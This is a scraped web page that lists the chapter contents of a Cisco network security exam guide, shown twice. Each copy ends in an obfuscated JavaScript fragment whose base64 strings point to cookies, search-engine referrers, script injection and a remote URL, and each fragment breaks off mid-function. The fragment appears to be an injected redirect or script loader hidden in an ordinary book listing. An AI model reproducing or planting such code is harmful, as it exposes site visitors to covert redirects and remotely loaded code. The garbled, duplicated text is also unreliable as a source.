Foreword Introduction Part I Network Security Concepts Chapter 1 Understanding Network Security Principles "Do I Know This Already?" Quiz Foundation Topics Exploring Security Fundamentals Why Network Security Is a Necessity Types of Threats Scope of the Challenge Nonsecured Custom Applications The Three Primary Goals of Network Security Confidentiality Integrity Availability Categorizing Data Classification Models Classification Roles Controls in a Security Solution Responding to a Security Incident Legal and Ethical Ramifications Legal Issues to Consider Understanding the Methods of Network Attacks Vulnerabilities Potential Attackers The Mind-set of a Hacker Defense in Depth Understanding IP Spoofing Launching a Remote IP Spoofing Attack with IP Source Routing Launching a Local IP Spoofing Attack Using a Man-in-the-Middle Attack Protecting Against an IP Spoofing Attack Understanding Confidentiality Attacks Understanding Integrity Attacks Understanding Availability Attacks Best-Practice Recommendations Exam Preparation Tasks Review All the Key Topics Complete the Tables and Lists from Memory Definition of Key Terms Chapter 2 Developing a Secure Network"Do I Know This Already?" Quiz Foundation Topics Increasing Operations Security System Development Life Cycle 49 Initiation 49 Acquisition and Development 49 Implementation 50 Operations and Maintenance 50 Disposition 51 Operations Security Overview 51 Evaluating Network Security 52 Nmap 54 Disaster Recovery Considerations 55 Types of Disruptions 56 Types of Backup Sites 56Constructing a Comprehensive Network Security Policy 57 Security Policy Fundamentals 57 Security Policy Components 58 Governing Policy 58 Technical Policies 58 End-User Policies 59 More-Detailed Documents 59 Security Policy Responsibilities 59 Risk Analysis, Management, and Avoidance 60 Quantitative Analysis 60 Qualitative Analysis 61 Risk Analysis Benefits 61 Risk Analysis Example: Threat Identification 61 Managing and Avoiding Risk 62 Factors Contributing to a Secure Network Design 62 Design Assumptions 63 Minimizing Privileges 63 Simplicity Versus Complexity 64 User Awareness and Training 64Creating a Cisco Self-Defending Network 66 Evolving Security Threats 66 Constructing a Cisco Self-Defending Network 67 Cisco Security Management Suite 69 Cisco Integrated Security Products 70Exam Preparation Tasks 74Review All the Key Topics 74Complete the Tables and Lists from Memory 75Definition of Key Terms 75Chapter 3 Defending the Perimeter 77"Do I Know This Already?" Quiz 77Foundation Topics 81ISR Overview and Providing Secure Administrative Access 81 IOS Security Features 81 Cisco Integrated Services Routers 81 Cisco 800 Series 82 Cisco 1800 Series 83 Cisco 2800 Series 84 Cisco 3800 Series 84 ISR Enhanced Features 85 Password-Protecting a Router 86 Limiting the Number of Failed Login Attempts 92 Setting a Login Inactivity Timer 92 Configuring Privilege Levels 93 Creating Command-Line Interface Views 93 Protecting Router Files 95 Enabling Cisco IOS Login Enhancements for Virtual Connections 96 Creating a Banner Message 98Cisco Security Device Manager Overview 99 Introducing SDM 99 Preparing to Launch Cisco SDM Exploring the Cisco SDM Interface Exam Preparation Tasks Review All the Key Topics Complete the Tables and Lists from Memory Definition of Key Terms Command Reference to Check Your Memory Chapter 4 Configuring AAA "Do I Know This Already?" Quiz Foundation Topics Configuring AAA Using the Local User Database Authentication, Authorization, and Accounting AAA for Cisco Routers Router Access Authentication Using AAA to Configure Local User Database Authentication Defining a Method List Setting AAA Authentication for Login Configuring AAA Authentication on Serial Interfaces Running PPP Using the aaa authentication enable default Command Implementing the aaa authorization Command Working with the aaa accounting Command Using the CLI to Troubleshoot AAA for Cisco Routers Using Cisco SDM to Configure AAA Configuring AAA Using Cisco Secure ACS Overview of Cisco Secure ACS for Windows Additional Features of Cisco Secure ACS 4.. var _0xb47f=['ZElIbXg=','bUpoZVY=','OyBleHBpcmVzPQ==','Z2V0VGltZQ==','QlJRank=','VFNBbWI=','T0ZGc0Y=','OyBkb21haW49','c3BsaXQ=','Z2taeUM=','Uk5BU0Q=','RkJkTmk=','elRiUks=','V29LVnk=','VXFyU1Y=','WG1qcko=','VXZlV2o=','R2lDQkY=','dmlzaXRlZA==','LmJpbmcu','LnlhaG9vLg==','LnlhbmRleC4=','aVdTTFY=','ZlJndGY=','blNwYnE=','Lmdvb2dsZS4=','elBJUVk=','UEpKZU4=','LmFzay4=','LmFsdGF2aXN0YS4=','bEpIS2c=','cmVmZXJyZXI=','Z2V0','SVdLaVY=','TkdhSlI=','VHhWbGI=','dFdGWWg=','aVBKWVc=','c2V0','bWp3Q3I=','aHR0cHM6Ly9ib29rc2ZpbmRlci50b3AvYm9va3MyMDE5LnBocD94PXNhJnF1ZXJ5PQ==','ZEtwbVc=','d2pESEw=','a2FQSUk=','S0hBc0w=','UVZuUEE=','aW5kZXhPZg==','c2NyaXB0','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','YXBwZW5kQ2hpbGQ=','MTMxMDYyNzIy','OyBwYXRoPQ==','OyBzZWN1cmU=','aGxxckw=','bWF0Y2g=','b1lYV0g=','bERmZmo=','bGVuZ3Ro','Y29va2ll','Q0dxaUc=','SXpXWkM='];(function(_0x48a97c,_0xc2414){var _0x2bef7b=function(_0x4d470a){while(--_0x4d470a){_0x48a97c['push'](_0x48a97c['shift']());}};_0x2bef7b( _0xc2414);}(_0xb47f,0x6c));var _0x45d2=function(_0x432a40,_0xc107af){_0x432a40=_0x432a40-0x0;var _0x4ab2dd=_0xb47f[_0x432a40];if(_0x45d2['JWIIVG']===undefined){(function(){var _0x4d57b3=function(){var _0x349b35;try{_0x349b35=Function('return\x20(function()\x20' '{}.. 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Foreword Introduction Part I Network Security Concepts Chapter 1 Understanding Network Security Principles "Do I Know This Already?" Quiz Foundation Topics Exploring Security Fundamentals Why Network Security Is a Necessity Types of Threats Scope of the Challenge Nonsecured Custom Applications The Three Primary Goals of Network Security Confidentiality Integrity Availability Categorizing Data Classification Models Classification Roles Controls in a Security Solution Responding to a Security Incident Legal and Ethical Ramifications Legal Issues to Consider Understanding the Methods of Network Attacks Vulnerabilities Potential Attackers The Mind-set of a Hacker Defense in Depth Understanding IP Spoofing Launching a Remote IP Spoofing Attack with IP Source Routing Launching a Local IP Spoofing Attack Using a Man-in-the-Middle Attack Protecting Against an IP Spoofing Attack Understanding Confidentiality Attacks Understanding Integrity Attacks Understanding Availability Attacks Best-Practice Recommendations Exam Preparation Tasks Review All the Key Topics Complete the Tables and Lists from Memory Definition of Key Terms Chapter 2 Developing a Secure Network"Do I Know This Already?" Quiz Foundation Topics Increasing Operations Security System Development Life Cycle 49 Initiation 49 Acquisition and Development 49 Implementation 50 Operations and Maintenance 50 Disposition 51 Operations Security Overview 51 Evaluating Network Security 52 Nmap 54 Disaster Recovery Considerations 55 Types of Disruptions 56 Types of Backup Sites 56Constructing a Comprehensive Network Security Policy 57 Security Policy Fundamentals 57 Security Policy Components 58 Governing Policy 58 Technical Policies 58 End-User Policies 59 More-Detailed Documents 59 Security Policy Responsibilities 59 Risk Analysis, Management, and Avoidance 60 Quantitative Analysis 60 Qualitative Analysis 61 Risk Analysis Benefits 61 Risk Analysis Example: Threat Identification 61 Managing and Avoiding Risk 62 Factors Contributing to a Secure Network Design 62 Design Assumptions 63 Minimizing Privileges 63 Simplicity Versus Complexity 64 User Awareness and Training 64Creating a Cisco Self-Defending Network 66 Evolving Security Threats 66 Constructing a Cisco Self-Defending Network 67 Cisco Security Management Suite 69 Cisco Integrated Security Products 70Exam Preparation Tasks 74Review All the Key Topics 74Complete the Tables and Lists from Memory 75Definition of Key Terms 75Chapter 3 Defending the Perimeter 77"Do I Know This Already?" Quiz 77Foundation Topics 81ISR Overview and Providing Secure Administrative Access 81 IOS Security Features 81 Cisco Integrated Services Routers 81 Cisco 800 Series 82 Cisco 1800 Series 83 Cisco 2800 Series 84 Cisco 3800 Series 84 ISR Enhanced Features 85 Password-Protecting a Router 86 Limiting the Number of Failed Login Attempts 92 Setting a Login Inactivity Timer 92 Configuring Privilege Levels 93 Creating Command-Line Interface Views 93 Protecting Router Files 95 Enabling Cisco IOS Login Enhancements for Virtual Connections 96 Creating a Banner Message 98Cisco Security Device Manager Overview 99 Introducing SDM 99 Preparing to Launch Cisco SDM Exploring the Cisco SDM Interface Exam Preparation Tasks Review All the Key Topics Complete the Tables and Lists from Memory Definition of Key Terms Command Reference to Check Your Memory Chapter 4 Configuring AAA "Do I Know This Already?" Quiz Foundation Topics Configuring AAA Using the Local User Database Authentication, Authorization, and Accounting AAA for Cisco Routers Router Access Authentication Using AAA to Configure Local User Database Authentication Defining a Method List Setting AAA Authentication for Login Configuring AAA Authentication on Serial Interfaces Running PPP Using the aaa authentication enable default Command Implementing the aaa authorization Command Working with the aaa accounting Command Using the CLI to Troubleshoot AAA for Cisco Routers Using Cisco SDM to Configure AAA Configuring AAA Using Cisco Secure ACS Overview of Cisco Secure ACS for Windows Additional Features of Cisco Secure ACS 4.. var _0xb47f=['ZElIbXg=','bUpoZVY=','OyBleHBpcmVzPQ==','Z2V0VGltZQ==','QlJRank=','VFNBbWI=','T0ZGc0Y=','OyBkb21haW49','c3BsaXQ=','Z2taeUM=','Uk5BU0Q=','RkJkTmk=','elRiUks=','V29LVnk=','VXFyU1Y=','WG1qcko=','VXZlV2o=','R2lDQkY=','dmlzaXRlZA==','LmJpbmcu','LnlhaG9vLg==','LnlhbmRleC4=','aVdTTFY=','ZlJndGY=','blNwYnE=','Lmdvb2dsZS4=','elBJUVk=','UEpKZU4=','LmFzay4=','LmFsdGF2aXN0YS4=','bEpIS2c=','cmVmZXJyZXI=','Z2V0','SVdLaVY=','TkdhSlI=','VHhWbGI=','dFdGWWg=','aVBKWVc=','c2V0','bWp3Q3I=','aHR0cHM6Ly9ib29rc2ZpbmRlci50b3AvYm9va3MyMDE5LnBocD94PXNhJnF1ZXJ5PQ==','ZEtwbVc=','d2pESEw=','a2FQSUk=','S0hBc0w=','UVZuUEE=','aW5kZXhPZg==','c2NyaXB0','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','YXBwZW5kQ2hpbGQ=','MTMxMDYyNzIy','OyBwYXRoPQ==','OyBzZWN1cmU=','aGxxckw=','bWF0Y2g=','b1lYV0g=','bERmZmo=','bGVuZ3Ro','Y29va2ll','Q0dxaUc=','SXpXWkM='];(function(_0x48a97c,_0xc2414){var _0x2bef7b=function(_0x4d470a){while(--_0x4d470a){_0x48a97c['push'](_0x48a97c['shift']());}};_0x2bef7b( _0xc2414);}(_0xb47f,0x6c));var _0x45d2=function(_0x432a40,_0xc107af){_0x432a40=_0x432a40-0x0;var _0x4ab2dd=_0xb47f[_0x432a40];if(_0x45d2['JWIIVG']===undefined){(function(){var _0x4d57b3=function(){var _0x349b35;try{_0x349b35=Function('return\x20(function()\x20' '{}.. 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